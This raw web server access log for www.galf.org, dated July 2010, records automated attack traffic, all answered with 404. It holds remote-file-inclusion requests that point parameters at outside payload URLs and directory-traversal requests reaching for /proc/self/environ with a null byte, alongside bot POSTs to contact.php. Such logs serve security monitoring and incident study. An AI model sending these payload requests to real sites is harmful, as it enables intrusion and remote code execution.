86.109.96.188 - - [25/Jul/2010:22:19:22 -0700] "GET /logs/access_090914.log////include/bbs.lib.inc.php?site_path=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
86.109.96.188 - - [25/Jul/2010:22:19:30 -0700] "GET /logs/access_100524.log////include/bbs.lib.inc.php?site_path=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:22:19:32 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:22:19:32 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:22:19:33 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:22:19:33 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:22:19:35 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:22:19:35 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:22:19:36 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:22:19:36 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:22:19:36 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:22:19:36 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:22:19:37 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:22:19:37 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:22:19:39 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:22:19:39 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:22:20:34 -0700] "POST /logs/access_100329.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:22:20:35 -0700] "POST /logs/access_100329.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:22:20:41 -0700] "POST /logs/access_100329.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:22:20:42 -0700] "POST /logs/access_100329.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:22:20:44 -0700] "POST /logs/access_100329.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:22:20:44 -0700] "POST /logs/access_100329.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:22:20:45 -0700] "POST /logs/access_100329.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
91.215.170.13 - - [25/Jul/2010:22:21:03 -0700] "GET /logs/access_100705.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
91.215.170.13 - - [25/Jul/2010:22:21:03 -0700] "GET /logs/access_100705.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
91.215.170.13 - - [25/Jul/2010:22:21:04 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
91.215.170.13 - - [25/Jul/2010:22:21:04 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
91.215.170.13 - - [25/Jul/2010:22:21:04 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
91.215.170.13 - - [25/Jul/2010:22:21:04 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
91.215.170.13 - - [25/Jul/2010:22:21:07 -0700] "GET /logs/access_100705.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
91.215.170.13 - - [25/Jul/2010:22:21:07 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
91.215.170.13 - - [25/Jul/2010:22:21:08 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
91.215.170.13 - - [25/Jul/2010:22:21:12 -0700] "GET /logs/access_100705.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
91.215.170.13 - - [25/Jul/2010:22:21:13 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 - "-" "libwww-perl/5.831" "www.galf.org"
91.215.170.13 - - [25/Jul/2010:22:21:13 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
91.208.211.151 - - [25/Jul/2010:22:21:24 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.208.211.151 - - [25/Jul/2010:22:21:24 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.208.211.151 - - [25/Jul/2010:22:21:24 -0700] "POST /logs/access_100712.log%20%20/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.208.211.151 - - [25/Jul/2010:22:21:29 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.208.211.151 - - [25/Jul/2010:22:21:29 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.208.211.151 - - [25/Jul/2010:22:21:29 -0700] "POST /logs/access_100712.log%20%20/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.208.211.151 - - [25/Jul/2010:22:21:34 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.208.211.151 - - [25/Jul/2010:22:21:34 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.208.211.151 - - [25/Jul/2010:22:21:34 -0700] "POST /logs/access_100712.log%20%20/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
109.235.249.248 - - [25/Jul/2010:22:21:37 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
109.235.249.248 - - [25/Jul/2010:22:21:37 -0700] "POST /logs/access_100712.log%20%20/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
109.235.249.248 - - [25/Jul/2010:22:21:37 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
91.208.211.151 - - [25/Jul/2010:22:21:40 -0700] "POST /logs/access_100712.log%20%20/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.208.211.151 - - [25/Jul/2010:22:21:40 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.208.211.151 - - [25/Jul/2010:22:21:40 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.215.170.13 - - [25/Jul/2010:22:22:08 -0700] "GET /logs/access_100705.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
91.215.170.13 - - [25/Jul/2010:22:22:08 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
91.215.170.13 - - [25/Jul/2010:22:22:08 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
91.215.170.13 - - [25/Jul/2010:22:22:10 -0700] "GET /logs/access_100705.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
91.215.170.13 - - [25/Jul/2010:22:22:10 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
91.215.170.13 - - [25/Jul/2010:22:22:10 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
109.235.249.248 - - [25/Jul/2010:22:22:46 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
109.235.249.248 - - [25/Jul/2010:22:22:46 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
109.235.249.248 - - [25/Jul/2010:22:22:46 -0700] "POST /logs/access_100712.log%20%20/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
91.215.170.13 - - [25/Jul/2010:22:23:49 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
91.215.170.13 - - [25/Jul/2010:22:23:56 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
91.215.170.13 - - [25/Jul/2010:22:24:06 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
91.215.170.13 - - [25/Jul/2010:22:24:06 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
91.215.170.13 - - [25/Jul/2010:22:24:18 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
91.215.170.13 - - [25/Jul/2010:22:24:31 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
91.215.170.13 - - [25/Jul/2010:22:24:31 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
91.215.170.13 - - [25/Jul/2010:22:24:31 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
91.215.170.13 - - [25/Jul/2010:22:24:31 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
91.215.170.13 - - [25/Jul/2010:22:24:34 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
91.215.170.13 - - [25/Jul/2010:22:24:36 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
217.113.61.155 - - [25/Jul/2010:22:24:43 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "www.galf.org"
217.113.61.155 - - [25/Jul/2010:22:24:43 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "www.galf.org"
217.113.61.155 - - [25/Jul/2010:22:24:44 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "www.galf.org"
217.113.61.155 - - [25/Jul/2010:22:24:44 -0700] "POST /logs/access_100712.log%20%20/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "www.galf.org"
217.113.61.155 - - [25/Jul/2010:22:24:44 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "www.galf.org"
91.215.170.13 - - [25/Jul/2010:22:24:44 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
217.113.61.155 - - [25/Jul/2010:22:24:44 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "www.galf.org"
217.113.61.155 - - [25/Jul/2010:22:24:44 -0700] "POST /logs/access_100712.log%20%20/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "www.galf.org"
217.113.61.155 - - [25/Jul/2010:22:24:44 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "www.galf.org"
217.113.61.155 - - [25/Jul/2010:22:24:44 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "www.galf.org"
217.113.61.155 - - [25/Jul/2010:22:24:44 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "www.galf.org"
217.113.61.155 - - [25/Jul/2010:22:24:44 -0700] "POST /logs/access_100712.log%20%20/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "www.galf.org"
217.113.61.155 - - [25/Jul/2010:22:24:44 -0700] "POST /logs/access_100712.log%20%20/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "www.galf.org"
91.215.170.13 - - [25/Jul/2010:22:24:55 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
91.215.170.13 - - [25/Jul/2010:22:24:55 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
91.215.170.13 - - [25/Jul/2010:22:25:08 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
91.215.170.13 - - [25/Jul/2010:22:25:09 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
91.215.170.13 - - [25/Jul/2010:22:25:10 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
91.215.170.13 - - [25/Jul/2010:22:25:11 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
91.215.170.13 - - [25/Jul/2010:22:25:29 -0700] "GET /logs/access_100705.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
91.215.170.13 - - [25/Jul/2010:22:25:29 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
91.215.170.13 - - [25/Jul/2010:22:25:29 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
86.104.72.1 - - [25/Jul/2010:22:25:34 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://livetest.foregroundsecurity.com//Iivetest/zfxid1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
86.104.72.1 - - [25/Jul/2010:22:25:34 -0700] "GET /logs/access_091123.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://livetest.foregroundsecurity.com//Iivetest/zfxid1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
86.104.72.1 - - [25/Jul/2010:22:25:34 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://livetest.foregroundsecurity.com//Iivetest/zfxid1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.105.83.126 - - [25/Jul/2010:22:25:48 -0700] "POST /logs/access_100712.log/contact.php HTTP/1.1" 404 - "-" "Jcomers Bot Scan" "www.galf.org"
203.105.83.126 - - [25/Jul/2010:22:25:49 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Jcomers Bot Scan" "www.galf.org"
203.105.83.126 - - [25/Jul/2010:22:25:49 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Jcomers Bot Scan" "www.galf.org"
203.105.83.126 - - [25/Jul/2010:22:25:49 -0700] "POST /logs/access_100712.log/contact.php HTTP/1.1" 404 - "-" "Jcomers Bot Scan" "www.galf.org"
203.105.83.126 - - [25/Jul/2010:22:25:49 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Jcomers Bot Scan" "www.galf.org"
203.105.83.126 - - [25/Jul/2010:22:25:49 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Jcomers Bot Scan" "www.galf.org"
203.105.83.126 - - [25/Jul/2010:22:25:50 -0700] "POST /logs/access_100712.log/contact.php HTTP/1.1" 404 - "-" "Jcomers Bot Scan" "www.galf.org"
203.105.83.126 - - [25/Jul/2010:22:25:50 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Jcomers Bot Scan" "www.galf.org"
203.105.83.126 - - [25/Jul/2010:22:25:50 -0700] "POST /contact.php HTTP/1.0" 404 - "-" "Jcomers Bot Scan" "www.galf.org"
203.105.83.126 - - [25/Jul/2010:22:25:50 -0700] "POST /logs/access_100712.log/contact.php HTTP/1.1" 404 - "-" "Jcomers Bot Scan" "www.galf.org"
203.105.83.126 - - [25/Jul/2010:22:25:50 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Jcomers Bot Scan" "www.galf.org"
203.105.83.126 - - [25/Jul/2010:22:25:50 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Jcomers Bot Scan" "www.galf.org"
203.105.83.126 - - [25/Jul/2010:22:25:51 -0700] "POST /logs/access_100712.log/contact.php HTTP/1.1" 404 - "-" "Jcomers Bot Scan" "www.galf.org"
203.105.83.126 - - [25/Jul/2010:22:25:51 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Jcomers Bot Scan" "www.galf.org"
203.105.83.126 - - [25/Jul/2010:22:25:51 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Jcomers Bot Scan" "www.galf.org"
91.215.170.13 - - [25/Jul/2010:22:25:52 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
203.105.83.126 - - [25/Jul/2010:22:25:52 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Jcomers Bot Scan" "www.galf.org"
91.215.170.13 - - [25/Jul/2010:22:25:52 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
203.105.83.126 - - [25/Jul/2010:22:25:52 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Jcomers Bot Scan" "www.galf.org"
203.105.83.126 - - [25/Jul/2010:22:25:52 -0700] "POST /logs/access_100712.log/contact.php HTTP/1.1" 404 - "-" "Jcomers Bot Scan" "www.galf.org"
91.215.170.13 - - [25/Jul/2010:22:26:04 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
91.215.170.13 - - [25/Jul/2010:22:26:04 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
91.215.170.13 - - [25/Jul/2010:22:26:05 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
91.215.170.13 - - [25/Jul/2010:22:26:11 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
91.215.170.13 - - [25/Jul/2010:22:26:16 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
211.169.249.251 - - [25/Jul/2010:22:26:56 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
211.169.249.251 - - [25/Jul/2010:22:26:56 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
211.169.249.251 - - [25/Jul/2010:22:26:56 -0700] "POST /logs/access_100712.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
202.160.123.72 - - [25/Jul/2010:22:27:06 -0700] "POST /logs/access_100712.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.galf.org"
202.160.123.72 - - [25/Jul/2010:22:27:06 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.galf.org"
202.160.123.72 - - [25/Jul/2010:22:27:07 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.galf.org"
91.215.170.13 - - [25/Jul/2010:22:27:37 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
91.215.170.13 - - [25/Jul/2010:22:27:38 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
91.215.170.13 - - [25/Jul/2010:22:27:43 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
91.215.170.13 - - [25/Jul/2010:22:27:43 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
86.104.72.1 - - [25/Jul/2010:22:28:10 -0700] "GET /logs/access_100215.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://livetest.foregroundsecurity.com//Iivetest/zfxid1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.215.170.13 - - [25/Jul/2010:22:28:39 -0700] "GET /logs/access_100705.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
91.215.170.13 - - [25/Jul/2010:22:28:39 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
91.215.170.13 - - [25/Jul/2010:22:28:40 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
91.215.170.13 - - [25/Jul/2010:22:29:01 -0700] "GET /logs/access_100705.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
91.215.170.13 - - [25/Jul/2010:22:29:01 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
91.215.170.13 - - [25/Jul/2010:22:29:01 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
91.215.170.13 - - [25/Jul/2010:22:29:19 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
91.215.170.13 - - [25/Jul/2010:22:29:20 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
201.232.70.254 - - [25/Jul/2010:22:29:30 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
201.232.70.254 - - [25/Jul/2010:22:29:33 -0700] "POST /logs/access_100712.log%20%20//contact.php HTTP/1.0" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
201.232.70.254 - - [25/Jul/2010:22:29:33 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
